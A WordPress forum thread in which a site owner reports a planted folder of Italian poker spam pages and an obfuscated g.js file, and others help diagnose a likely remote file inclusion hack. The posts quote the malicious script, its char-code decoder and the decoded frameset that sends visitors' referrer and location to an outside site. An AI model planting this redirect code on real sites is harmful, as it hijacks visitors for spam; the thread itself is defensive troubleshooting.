My site was ambushed…need help figuring out how

  • [Note: I edited this post to contain the full .js file]

    Tonight, while checking my site backup’s sync log, I noticed a folder named “1” in the output, residing at the top level of the wp-content folder. Within the “1” folder, there are 71 separate files — 70 poker-site-spammy HTML pages, each in Italian, and one g.js file. There was also a folder named backup-6bb0d, which contained a zero-byte index.php, at the top level of the wp-content folder. The wp-content’s index.php file (which just says ‘silence is golden’) had also been edited or replaced — but the only change is a blank line on row one. My site itself wasn’t hacked — all files and folders are just fine. No new stories or comments or users were created, etc. It seems the extent of the hack was creating the “1” folder.

    I checked my sftp, ftp, and access logs, and there’s nothing suspicious there at all — which makes me suspect this is some sort of injection attack. I searched the logs around the time the files were created, but with my limited technical skills, noting seemed out of whack (there are no references to “poker.html” in any of the log files, for instance). The g.js file contains one “var str” definition that’s ASCII encoded; I decoded it and got this output (line breaks added for readability):

    var referer = escape(document.referrer);"
"var fromd    = escape(document.location);"
"document.write("<fram"+"eset frame"+"border=0
frames"+"pacing=0 border=0 rows=\"1"+"00%, *
\"noresize><fr"+"ame name=\"online\" src=\""+
fid+"&q="+q1+"&referer="+referer+"&l="+lang+"
&c="+subacc+"&from="+fromd+"\" noresize></fra"+"meset>");

    That means nothing at all to me. Here’s the full .js file, with the “var str” bit removed, given it’s shown above:

    function Decode()
{
var temp="",i,c=0,out="";
var str="118#97#114#32#etc as decoded above...;
l=str.length;
while(c<=str.length-1)
  {
  while(str.charAt(c)!='#')
  temp=temp+str.charAt(c++);
  c++;
  out=out+String.fromCharCode(temp);
  temp="";
  }
document.write(out);
}

function r(keyw, cat, lang)
{
document.write("<script language='javascript'>");
document.write("var fid='https://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"'; var lang='"+lang+"'; var subacc='"+cat+"';");
Decode();
document.write("<\/script>");
}

    In the HTML files themselves, there are only four links. The first three are external links, but they simply go to the Italian versions of Google, MSN, and Yahoo (nothing passed with the URLs at all, just the root). The fourth is an href link back to the document itself, like this:

    <a href="giochi-poker-gratis-da-scaricare.html">giochi poker gratis da scaricare</a>

    I’m not sure if the Javascript works (somehow?) with that last URL, but that’s all that’s in each file (I’ll gladly send anyone the folder if you want to take a look at the whole thing). I also Googled on one of the less-commonly-named files, and found that my site is not alone. As you can see there, a number of WordPress sites contain the “1” folder and associated HTML files.

    My site runs WordPress 2.3.3, but I do use a number of third-party plug-ins — and that’s where my suspicions lie for the most likely culprit. However, I don’t have any idea how to go about figuring out how someone got in … nor if there are better places than this to report an apparent security issue. So if anyone can offer any advice, I’d welcome it!

    thanks;
    -rob.

Viewing 15 replies - 1 through 15 (of 29 total)

  • Yep, someone here on the WP forums warned about it on March 13 and posted this link: (I cannot find the original WP post right now, but I did bookmark the link.)

    https://seo.mhvt.net/blog/?p=268

    it would be useful to know what plugins you have on that site.

    let me guess — you are using either wp-cache, or wp-db-backup? Or both?

    Someone here on the WP forums warned about it on March 13…

    That was our story. The article is shown at p=268. So you’ve got the right link. So far, at least 62 or 63 WordPress blog websites are known to have been exploited in this manner. robservatory.com is not in the list.

    griffman, I wonder if you could send those 71 files in zip to [email protected]? We love junks files and junk mail. Again, we do analyze security issues. Thanks.

    Thread Starter griffman

    (@griffman)

    Plug-ins. I have a larger number installed, but only these are active (are non-active plug-ins exploitable??):

    Active Discussions 1.1
    Addicted To Live Search 1.02
    AJAX Comment Preview 1.2.1
    Ajaxified Expand NOW 0.8 beta 2
    Category Replacement Widget 0.5
    Dashboard Options 1.4.1
    Drop-down Archive Widget 0.2
    Get Recent Comments 2.0.2
    GetWeather 1.2.1
    Get Weather Widget 0.2
    http:BL WordPress Plugin 1.4
    Linkblock widget 1.1rc0
    Spam Karma 2 2.3 rc4

    I have wp-db-backup installed, but non-active. I do not have wp-cache installed. I have one additional personal plug-in (custom registration screen) I wrote installed, but given other sites have been hit with the same thing, I doubt it’s the problem.

    macsoft3: files sent.

    Thanks all for the answers — I searched here, but didn’t find the March 13th post…not sure what happens from here out (should I report this somehow to the WP developers?), but I’m certainly going to keep an eye on my wp-content folder!

    -rob.

    If your wp-content directory is still writable, fix that.

    chmod 755.

    That’s one of the first things I would be doing. Ive argued against plugins and settings that require that for three years.

    As to whether or not non activated plugins are potentially exploitable — yes, they are — when it comes to any kind of Remote File Inclusion attacks. If I can call a file, I can use it. Whether or not a plugin is activated makes no difference.

    I would be interested in seeing your Apache log files, if you have them available.

    I am not in China, or some other Southeast Asian country (thats notorious for what else, but spam), and I dont pretend to be some “spam terrorist” warrior. I also dont use this forum as an advertising agency for my own blog. Furthermore, terrorist, as macsoft has used it, is grossly incorrect. But thats another story all together.

    Anyway, if you feel like having another set of eyes look over them, I would love to see your Apache access logs for the this month. And your error logs, if you have them being generated separately. I dont need to see the content of the added files, they’re useless.

    My email addy is whoo –AT– whoo.org

    Thanks, griffman. I got it. jonimueller refers March 13 report to the one at seo.mhvt.net. If you can answer, what is the date stamp on those files in folder 1? Is it March 12 or 13? Or around 02:58 AM on the 15th? I’m just curious. Again, thanks. They started hacking WP websites at least before 11th.

    Thread Starter griffman

    (@griffman)

    My wp-content directory is *not* generally writable, nor has it ever been generally writable. Here’s what it’s set up as:

    drwxr-xr-x Mar 16 08:42 wp-content

    I have removed the inactive plug-ins, and also killed the xmlrpc.php file, as I don’t use its features. I will send you the March-ish access logs, but I don’t have error logs (my host does not provide them, sadly).

    -rob.

    Thread Starter griffman

    (@griffman)

    macsoft: The files were all timestamped 2:58am on the 15th.

    -rob.

    Thanks, griffman. That means they are constantly hacking WP blogs.

    There’s an interesting code embedded in g.js. It’s “118#97#114#32#114#101#102#101#114#101#114#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#114#101#102#101#114#114#101#114#41#59#10#118#97#114#32#102#114#111#109#100#32#32#32#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#108#111#99#97#116#105#111#110#41#59#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#102#114#97#109#34#43#34#101#115#101#116#32#102#114#97#109#101#34#43#34#98#111#114#100#101#114#61#48#32#102#114#97#109#101#115#34#43#34#112#97#99#105#110#103#61#48#32#98#111#114#100#101#114#61#48#32#114#111#119#115#61#92#34#49#34#43#34#48#48#37#44#32#42#32#92#34#110#111#114#101#115#105#122#101#62#60#102#114#34#43#34#97#109#101#32#110#97#109#101#61#92#34#111#110#108#105#110#101#92#34#32#115#114#99#61#92#34#34#43#102#105#100#43#34#38#113#61#34#43#113#49#43#34#38#114#101#102#101#114#101#114#61#34#43#114#101#102#101#114#101#114#43#34#38#108#61#34#43#108#97#110#103#43#34#38#99#61#34#43#115#117#98#97#99#99#43#34# 38#102#114#111#109#61#34#43#102#114#111#109#100#43#34#92#34#32#110#111#114#101#115#105#122#101#62#60#47#102#114#97#34#43#34#109#101#115#101#116#62#34#41#59#”

    I thought I could decode it, but no vail so far.

    Ahh, sorry. griffman already decoded it.

    great Rob .. Im looking forward to looking at them.

    If you like, I can provide a way for you do some more intense logging, and I HIGHLY recommend finding out if your host has mod_security compiled into Apache. If they do, use it.

    I found the exploit in your logs. Check your email in a few minutes.

    I will be emailing [email protected]

    There were http_posts sent to certain files (that I pointed out in my emails). The data sent in the posts isnt going to be seen in your logs, unfortunately. The filename, however, is clear as day.

    You can log ALL http_posts. Ive emailed you a few times, so I’ll wait to hear back from you and then if you are willing you can be a honeypot ??

    I’ll also take this opportunity to reiterate that I would not share this info with anyone else. Its NOT going on MY blog, and anything we talk about in emails is between you, me, and whoever answers email at security@

    Without divulging the file name, I should say, that I just looked through my own mod_security logs, and see a different attempt at an RFI attack, pointed at a core file that lives inside wp-includes/

    Interesting. Time to go test that.

    This happened to me, too! The file was timestamped 3/18. My wp-content folder was already set at permission 755, so I don’t know how the hacker got in there. I was running wp-cache and deactivated it. I also deleted the “1” folder, but I wonder if the hacker will come back?

    this thread was resolved, thesu. I assure you that if your site was compromised at some point, they will come back.

    You might not see em, but they will come back. Keep in mind, that coming back doesnt mean they are successful –

    There were several key things left out of your post though:

    1. what version of WP were you running at the time you discovered the hack? Youre running 2.3.3 now..

    2. What have you done to secure your site since seeing this? You mention nothing.

    Deleting the files.. is like putting a bandaid on a severed artery. You just bleed to death slower.

Viewing 15 replies - 1 through 15 (of 29 total)
  • The topic ‘My site was ambushed…need help figuring out how’ is closed to new replies.